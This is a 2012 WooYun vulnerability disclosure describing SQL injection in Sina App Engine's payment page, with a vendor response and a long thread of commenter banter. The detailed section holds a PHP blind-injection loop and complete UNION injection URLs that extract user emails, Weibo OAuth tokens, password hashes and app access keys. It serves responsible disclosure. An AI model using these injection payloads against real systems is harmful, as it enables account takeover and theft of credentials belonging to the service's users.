当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011189

漏洞标题:新浪SAE沦陷,oauth token/安全密码全部泄露,hack任意app

相关厂商:新浪

漏洞作者: 牛奶坦克

提交时间:2012-08-22 19:50

修复时间:2012-10-06 19:50

公开时间:2012-10-06 19:50

漏洞类型:内部绝密信息泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-22: 细节已通知厂商并且等待厂商处理中
2012-08-22: 厂商已经确认,细节仅向厂商公开
2012-09-01: 细节向核心白帽子及相关领域专家公开
2012-09-11: 细节向普通白帽子公开
2012-09-21: 细节向实习白帽子公开
2012-10-06: 细节向公众公开

简要描述:

下午本打算给SAE冲几个云豆试试短信功能,因为很久没黑箱了,就想看看支付问题,结果却发现另一个漏洞,可以获取sae上你想到的所有信息,危及所有用户,一泻千里啊一泻千里,顺手带走了“互联网那点事”(此站建立在SAE上),测试了以下沦陷任意SAE站点的想法...
不过官方大可放心,并没有拖库也没有看订单信息,赶紧修复吧:)
PS:没想到啊没想到,还没研究sae沙箱环境,在主站就找到了短板,而且短的可怕。

详细说明:

问题归根结底是一个SQL注入,SAE为什么会有注射?想完抽了自己一巴掌,SAE为什么不能有注射?!
一般明面的问题sina安全团队可以发现,而且也会被过路黑客帮忙检测,凭着直觉,问题会出现在一些角落,一些不被人注意到的地方,就在这里:

http://sae.sina.com.cn/pay/result/xft?sae_internal=1&may_fail=0&order_id=1


一个付费信息反馈页面,用sqlmap跑了一下,这个傻缺居然告诉我只能盲注。。。自己写了个临时脚本跑数据库。

<?php
$url = "http://sae.sina.com.cn/pay/result/xft?sae_internal=1&may_fail=0&order_id=1'";
for ($i=0; $i < 1000; $i++) {  //很搓吧。。
	$res = explode("|",curlrequest($url.urlencode(" and 1=2 union select 1,concat(0x7c,COLUMN_NAME,0x7c),3,4,5 from information_schema.COLUMNS where TABLE_NAME='user' limit $i,1#")));
	echo $res[10]."\r\n";
}
省略curl定义


部分数据

database:
information_schema
app_store
cron
cron2
cron_result
mysql_stat
sae
sae_java
sae_nodejs
swsUser
test
xweibo
admin表    ->   
id
sws_uid
name
password
email
timeline
role
s_mail
mobile
app表存放app相关信息,比如名称\accesskey  -->
name
cn_name
api_version
biz_type
desp
default_version
cname
create_uid
accesskey
group_name
pool_name
svn_url
status
timeline
mysql_port
old_status
hash
cookie
platform
lang
app_type
middle_type
icon
status_flags
delete_time
user表存放用户所有信息,uid、oauth、email、sae的二次安全密码  --> 
id
name
email
password_md5
mobile
tel
status
timeline
expires
sws_uid
old_status
level
deleted
money
platform
beans_level
mobile_verified
mobile_reverified
is_active
weibo_uid
weibo_name
email_verified
weibo_access_token
devlevel
vdun
olevel
level_endtime
level_notify
up_welcomed
appmid
is_qy_vendor
last_update
userName


省去过多的猜测部分了,直接查询互联网那点事的用户相关信息
http://sae.sina.com.cn//pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,email,0x7c,weibo_name,0x7c,weibo_access_token,0x7c,password_md5,0x7c%29,3,4,5%20from%20sae.user%20where%20weibo_uid='1627825392'%20limit%200,1%23



那个md5密码就是sae二次安全密码,这个密码还有牛比的用途,后面说。
还可以查询accesskey
http://sae.sina.com.cn//pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,accesskey,0x7c,create_uid,0x7c%29,3,4,5%20from%20sae.app%20limit%200,1%23


可以看出想控制一个app所需的信息全部齐全了。。
8过,还可以利用更简单的方法,svn,sae svn的密码就是sae二次安全密码,嘿嘿。



好了,试试黑掉sae上任意的app吧。

漏洞证明:




证明完毕,结贴。

修复方案:

其实就是个注射而已,但是数据库如此透明想不通,权限。。
可以在数据库内找到想要的一切信息啊,是不是需要反省下?

版权声明:转载请注明来源 牛奶坦克@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-08-22 21:49

厂商回复:

多谢牛奶坦克,此问题已经修复。
现在的密码已经是进行加盐处理过的,请大家放心使用。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-08-22 19:52 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    我信洞主!

  2. 2012-08-22 19:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我信洞主!

  3. 2012-08-22 19:56 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    是不是哟~

  4. 2012-08-22 19:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @goderci 所以我说信洞主

  5. 2012-08-22 20:07 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    我信洞主!

  6. 2012-08-22 20:07 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    我信洞主。。

  7. 2012-08-22 20:14 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    我信洞主!搞了 多久洞主终于搞下来了。。。想当年。。。

  8. 2012-08-22 20:18 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    我信洞主!

  9. 2012-08-22 20:18 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    @xsser 那我信!!!

  10. 2012-08-22 20:18 | lanz ( 路人 | Rank:26 漏洞数:5 | whatever)

    占座围观

  11. 2012-08-22 20:29 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    我信洞主!

  12. 2012-08-22 20:34 | Eoh ( 普通白帽子 | Rank:286 漏洞数:35 )

    @xsser 我信xsser ,碉堡了 碉堡了。

  13. 2012-08-22 20:36 | 小一 ( 实习白帽子 | Rank:32 漏洞数:13 )

    @xsser 乌云不就是用的SAE么?

  14. 2012-08-22 20:36 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    有杀气啊 @胯下有杀气

  15. 2012-08-22 20:37 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    潜这么久的水了,看来得冒个泡了。

  16. 2012-08-22 20:51 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    搬凳子看故事。

  17. 2012-08-22 20:51 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    百万流量涌向sea

  18. 2012-08-22 20:56 | 波波虎 ( 普通白帽子 | Rank:266 漏洞数:51 | 11111111111)

    云不安全了。。。。

  19. 2012-08-22 21:08 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    我艹

  20. 2012-08-22 21:20 | Log ( 路人 | Rank:5 漏洞数:1 )

    占座...

  21. 2012-08-22 21:37 | 0gucci ( 普通白帽子 | Rank:166 漏洞数:33 | 深度值得深入)

    之前在zone社区里的讨论难道今天有突破了0 0#

  22. 2012-08-22 21:39 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    火了。膜拜

  23. 2012-08-22 21:58 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    密码已经是进行加盐处理过的,请大家放心使用

  24. 2012-08-22 22:15 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    加盐处理?“盐”我不懂,求科普

  25. 2012-08-22 22:21 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

    老实交代 拖了wooyun没

  26. 2012-08-22 22:22 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

    盐 == salt

  27. 2012-08-22 22:25 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @zeracker 就是被腌过了

  28. 2012-08-22 22:39 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    已经加了盐的。。

  29. 2012-08-22 22:52 | 牛奶坦克 ( 普通白帽子 | Rank:355 漏洞数:21 | 晚安,牛奶)

    @zhk 开始我也以为是有盐,不过试过后发现。。。

  30. 2012-08-22 23:26 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @牛奶坦克 是还有其他方式登录吧

  31. 2012-08-22 23:35 | 牛奶坦克 ( 普通白帽子 | Rank:355 漏洞数:21 | 晚安,牛奶)

    @zhk 不可多说了啊,等公开吧,官方反映很快,已经修复了,后面还有一些潜在问题在加固可能,不能透漏太多细节。

  32. 2012-08-22 23:35 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    新浪处理很迅速啊

  33. 2012-08-23 00:08 | ghy459 ( 实习白帽子 | Rank:62 漏洞数:5 | 深挖洞,广积shell。)

    加盐是啥意思呢请问= =

  34. 2012-08-23 00:30 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @ghy459 就给加点料,你就吃不出原来是什么了

  35. 2012-08-23 00:51 | 牛奶坦克 ( 普通白帽子 | Rank:355 漏洞数:21 | 晚安,牛奶)

    @zhk 好抽象的比喻,我喜欢,很恰当

  36. 2012-08-23 07:37 | krbl ( 实习白帽子 | Rank:97 漏洞数:13 | ♦♠♣♫♪☼☻☺ஐ♥♀♂☆๑۩۞۩๑☜☞...)

    加盐被阎成咸肉了?

  37. 2012-08-23 08:35 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    @牛奶坦克 擦 ~~ 乌云的库也被你脱了???? 改密码啊大家~!!

  38. 2012-08-23 08:39 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @坏虾 乌云是md5(email.md5(password))的

  39. 2012-08-23 08:42 | Topman王 ( 实习白帽子 | Rank:31 漏洞数:6 | 软件开发工程师!白帽子!XSSER,渗透,SEO)

    搬凳子看故事。

  40. 2012-08-23 09:00 | 大和尚 ( 实习白帽子 | Rank:49 漏洞数:5 | www.ieroot.com 积极向上的心态!百折不挠...)

    坐等讲座公开

  41. 2012-08-23 09:30 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    吓死我了,sae目标太大..

  42. 2012-08-23 09:48 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @xsser 算法不能讲呀,亲~~~~~~~脱裤了就恼火了~~~

  43. 2012-08-23 09:56 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    我信洞主!

  44. 2012-08-23 10:24 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    @xsser @小胖子 我相信剑哥是举例说明一下的。

  45. 2012-08-23 10:29 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    我信洞主!

  46. 2012-08-23 10:32 | cnyouker ( 普通白帽子 | Rank:134 漏洞数:13 | root it)

    占座围观

  47. 2012-08-23 10:34 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    后悔高中数学荒了,大学密码学残了……T_T

  48. 2012-08-23 10:37 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    膜拜下~

  49. 2012-08-23 10:38 | GaRY ( 实习白帽子 | Rank:39 漏洞数:3 | 真悲剧平男君)

    膜拜楼主

  50. 2012-08-23 11:16 | 墨水心_Len ( 实习白帽子 | Rank:70 漏洞数:15 | PKAV技术宅 | 每一个有文化的东西,我们都...)

    我信洞烛!

  51. 2012-08-23 11:39 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    @xsser 谢了

  52. 2012-08-23 13:00 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    云豆T T

  53. 2012-08-23 13:04 | 0gucci ( 普通白帽子 | Rank:166 漏洞数:33 | 深度值得深入)

    现在的密码加盐过...也就是说之前的密码还没加盐吗-_,

  54. 2012-08-23 14:06 | HRay ( 普通白帽子 | Rank:196 漏洞数:28 | 018)

    官方说的是现在的密码加盐,这么说之前就是普通md5了

  55. 2012-08-23 20:58 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)

    我信洞主!

  56. 2012-08-23 22:46 | 笑傲浆糊 ( 路人 | Rank:12 漏洞数:1 | 没死,还活在)

    云服务就是个炸弹,随时会爆炸

  57. 2012-09-07 13:20 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)

    密码已经是进行加盐处理过的,请大家放心使用

  58. 2012-09-12 00:36 | Xhm1n9 ( 实习白帽子 | Rank:57 漏洞数:13 | bug)

    十个wb太鸡巴贵了-,-!!

  59. 2012-09-12 08:49 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Xhm1n9 那就等等 最终会开放啊

  60. 2012-09-12 14:10 | Xhm1n9 ( 实习白帽子 | Rank:57 漏洞数:13 | bug)

    @xsser 穷人,只能等等了 -,-!!

  61. 2012-09-12 14:18 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    一辈子用英特尔cpu的命

  62. 2012-09-22 08:21 | 瀚海书香 ( 路人 | 还没有发布任何漏洞 | 主要从事网络安全和linux内核网络部分的研...)

    salt md5应该是常识啊,但愿sae其他的api都改了

  63. 2012-09-22 10:01 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    NB!

  64. 2012-09-23 10:16 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    有盾行不?

  65. 2012-09-26 13:42 | 九九 ( 路人 | Rank:5 漏洞数:4 | 暂无。)

    。。。。

  66. 2012-09-28 03:02 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    update一下money啊~

  67. 2012-10-01 18:46 | snower ( 路人 | Rank:0 漏洞数:2 | 君子不器)

    再加点醋。。。

  68. 2012-10-06 20:33 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    碉堡了。 一个注射点引起的血案

  69. 2012-10-08 12:05 | leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)

    真没拖?!

  70. 2012-10-08 13:54 | 坏人咖啡 ( 实习白帽子 | Rank:55 漏洞数:4 | 做一个简简单单的坏人)

    我信洞主!

  71. 2012-10-18 09:27 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    请放心使用~

  72. 2012-10-31 21:51 | Xeyes ( 路人 | Rank:12 漏洞数:2 | 好好学习,天天休息。)

    碉堡了..............撸主老实交代,偷偷充了多少芸豆~

  73. 2012-12-15 15:46 | 冰封 ( 路人 | Rank:11 漏洞数:1 | 认真做事,低调求发展! Mr.Fz's)

    一个注射点引起的血案!洞主是个神!

  74. 2013-08-28 14:21 | nick被注册 ( 普通白帽子 | Rank:125 漏洞数:20 | 天一)

    霸气。。

  75. 2014-05-25 10:27 | 好基友一辈子 ( 普通白帽子 | Rank:138 漏洞数:37 )

    @牛奶坦克 求一下那个盲注脚本的完整版,小菜学习一下可好

  76. 2015-08-05 16:42 | 枯荣 ( 路人 | Rank:6 漏洞数:3 | QQ)

    懂了